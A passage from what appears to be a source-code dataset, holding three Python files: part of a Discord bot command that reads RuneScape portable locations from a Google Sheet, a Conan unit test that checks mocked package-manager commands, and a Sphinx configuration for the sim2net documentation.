continue
# Separating locations
for location in re.findall('\d+.+?(?:CA|MG|PRIFF|PRIF|P|BU|SP|CW|BA)', locs.upper()):
name = location.split(' ')[-1]
name = re.sub('(?:PRIFF|PRIF)', 'P', name, re.I)
worlds[name] = re.findall('\d+', location)
return struct(author=author, locations=locations, last_updated=last_updated, time=time)
@staticmethod
async def _get_portables(http):
"""
Gets data from the google spreadsheet
"""
host = 'https://sheets.googleapis.com/v4/spreadsheets'
sheet_id = '16Yp-eLHQtgY05q6WBYA2MDyvQPmZ4Yr3RHYiBCBj2Hc'
sheet_name = 'Home'
range = 'A16:G18'
url = '%s/%s/values/%s!%s?key=%s' % (host, sheet_id, sheet_name, range, GOOGLE_API_KEY)
# Getting cells
async with http.get(url) as r:
# Checking request
if r.status != 200:
return None
return Portables._format_data(await r.json())
@commands.command(pass_context=True, aliases=['ports', 'port', 'portable'], description='Shows portable locations.')
async def portables(self, ctx, *, msg: str = ''):
ports = {
'fletcher': ('fletchers', 'fletch'),
'crafter': ('crafters', 'craft'),
'brazier': ('braziers', 'braz'),
'sawmill': ('saw', 'mill', 'sawmills'),
'forge': ('forges',),
'range': ('ranges', 'cook'),
'well': ('wells',)
}
parser = Arguments(allow_abbrev=False, prog='portables')
parser.add_argument('portable', nargs='?', type=enum(**ports), help='Selects a type of portable to search for.')
# Parsing arguments
await self.bot.send_typing(ctx.message.channel)
try:
args = parser.parse_args(split(msg))
except SystemExit:
await self.bot.say('```%s```' % parser.format_help())
return
except Exception as e:
await self.bot.say('```%s```' % str(e))
return
# Get portables from google sheet
portables = await Portables._get_portables(self.bot.whttp)
if not portables:
await self.bot.say('Google sheet could not be reached.')
return
# Building message
e = discord.Embed()
e.colour = 0x3572a7
e.timestamp = portables.time
e.set_footer(text='Updated %s ago' % portables.last_updated)
e.set_author(name=portables.author,
icon_url='http://services.runescape.com/m=avatar-rs/%s/chat.png' % urllib.parse.quote(portables.author))
# Adding portable locations
for portable, locations in portables.locations.items():
# Skipping if no the portable requested
if args.portable and args.portable not in portable:
continue
# No location for portable
if not locations:
e.add_field(name=portable.capitalize(), value='N/A')
continue
value = '\n'.join(['%s %s' % (', '.join(worlds), location) for location, worlds in locations.items()])
e.add_field(name=portable.capitalize(), value=value)
await self.bot.say(embed=e)
def setup(bot):
bot.add_cog(Portables(bot))
| duke605/RunePy | commands/portables.py | Python | mit | 4,554 |
import unittest
from conans.tools import SystemPackageTool, replace_in_file
import os
from conans.test.utils.test_files import temp_folder
from conans import tools
class RunnerMock(object):
def __init__(self):
self.command_called = None
def __call__(self, command, output):
self.command_called = command
class ReplaceInFileTest(unittest.TestCase):
def setUp(self):
text = u'J\xe2nis\xa7'
self.tmp_folder = temp_folder()
self.win_file = os.path.join(self.tmp_folder, "win_encoding.txt")
text = text.encode("Windows-1252", "ignore")
with open(self.win_file, "wb") as handler:
handler.write(text)
self.bytes_file = os.path.join(self.tmp_folder, "bytes_encoding.txt")
with open(self.bytes_file, "wb") as handler:
handler.write(text)
def test_replace_in_file(self):
replace_in_file(self.win_file, "nis", "nus")
replace_in_file(self.bytes_file, "nis", "nus")
with open(self.win_file, "rt") as handler:
content = handler.read()
self.assertNotIn("nis", content)
self.assertIn("nus", content)
with open(self.bytes_file, "rt") as handler:
content = handler.read()
self.assertNotIn("nis", content)
self.assertIn("nus", content)
class ToolsTest(unittest.TestCase):
def cpu_count_test(self):
cpus = tools.cpu_count()
self.assertIsInstance(cpus, int)
self.assertGreaterEqual(cpus, 1)
def system_package_tool_test(self):
runner = RunnerMock()
spt = SystemPackageTool(runner=runner)
# fake os info to linux debian, default sudo
spt._os_info.is_linux = True
spt._os_info.linux_distro = "debian"
spt.update()
self.assertEquals(runner.command_called, "sudo apt-get update")
spt._os_info.linux_distro = "ubuntu"
spt.update()
self.assertEquals(runner.command_called, "sudo apt-get update")
spt._os_info.linux_distro = "knoppix"
spt.update()
self.assertEquals(runner.command_called, "sudo apt-get update")
spt._os_info.linux_distro = "fedora"
spt.update()
self.assertEquals(runner.command_called, "sudo yum check-update")
spt._os_info.linux_distro = "redhat"
spt.install("a_package")
self.assertEquals(runner.command_called, "sudo yum install -y a_package")
spt._os_info.linux_distro = "debian"
spt.install("a_package")
self.assertEquals(runner.command_called, "sudo apt-get install -y a_package")
spt._os_info.is_macos = True
spt._os_info.is_linux = False
spt.update()
self.assertEquals(runner.command_called, "brew update")
spt.install("a_package")
self.assertEquals(runner.command_called, "brew install a_package")
os.environ["CONAN_SYSREQUIRES_SUDO"] = "False"
spt = SystemPackageTool(runner=runner)
spt._os_info.is_linux = True
spt._os_info.linux_distro = "redhat"
spt.install("a_package")
self.assertEquals(runner.command_called, "yum install -y a_package")
spt.update()
self.assertEquals(runner.command_called, "yum check-update")
spt._os_info.linux_distro = "ubuntu"
spt.install("a_package")
self.assertEquals(runner.command_called, "apt-get install -y a_package")
spt.update()
self.assertEquals(runner.command_called, "apt-get update")
spt._os_info.is_macos = True
spt._os_info.is_linux = False
spt.update()
self.assertEquals(runner.command_called, "brew update")
spt.install("a_package")
self.assertEquals(runner.command_called, "brew install a_package")
del os.environ["CONAN_SYSREQUIRES_SUDO"]
| dragly/conan | conans/test/tools_test.py | Python | mit | 3,849 |
# -*- coding: utf-8 -*-
# (c) 2012-2014 Michal Kalewski <mkalewski at cs.put.poznan.pl>
#
# This file is a part of the Simple Network Simulator (sim2net) project.
# USE, MODIFICATION, COPYING AND DISTRIBUTION OF THIS SOFTWARE IS SUBJECT TO
# THE TERMS AND CONDITIONS OF THE MIT LICENSE. YOU SHOULD HAVE RECEIVED A COPY
# OF THE MIT LICENSE ALONG WITH THIS SOFTWARE; IF NOT, YOU CAN DOWNLOAD A COPY
# FROM HTTP://WWW.OPENSOURCE.ORG/.
#
# For bug reports, feature and support requests please visit
# <https://github.com/mkalewski/sim2net/issues>.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../../'))
sys.path.append('.')
# -- General configuration ----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.doctest',
'sphinx.ext.autodoc',
'sphinx.ext.todo',
'sphinx.ext.mathjax'
]
mathjax_path = 'https://c328740.ssl.cf1.rackcdn.com/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML'
autoclass_content = 'both'
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'sim2net'
copyright = u' 2012-2014 Michal Kalewski'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
# version = '0.0.1'
# The full version, including alpha/beta/rc tags.
# release = '0.0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {'nosidebar': True}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
html_short_title = 'Simple Network Simulator'
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
html_domain_indices = True
# If false, no index is generated.
html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
html_show_sourcelink = False
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
html_show_sphinx = False
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'SimpleNetworkSimulatorsim2netdoc'
# -- Options for LaTeX output -------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'SimpleNetworkSimulatorsim2net.tex',
u'Simple Network Simulator (sim2net) Documentation', u'Michal Kalewski',
'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output -------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'simplenetworksimulatorsim2net',
u'Simple Network Simulator (sim2net) Documentation',
[u'Michal Kalewski'], 1)
]
| mkalewski/sim2net | docs/conf.py | Python | mit | 7,543 |
Subsets and Splits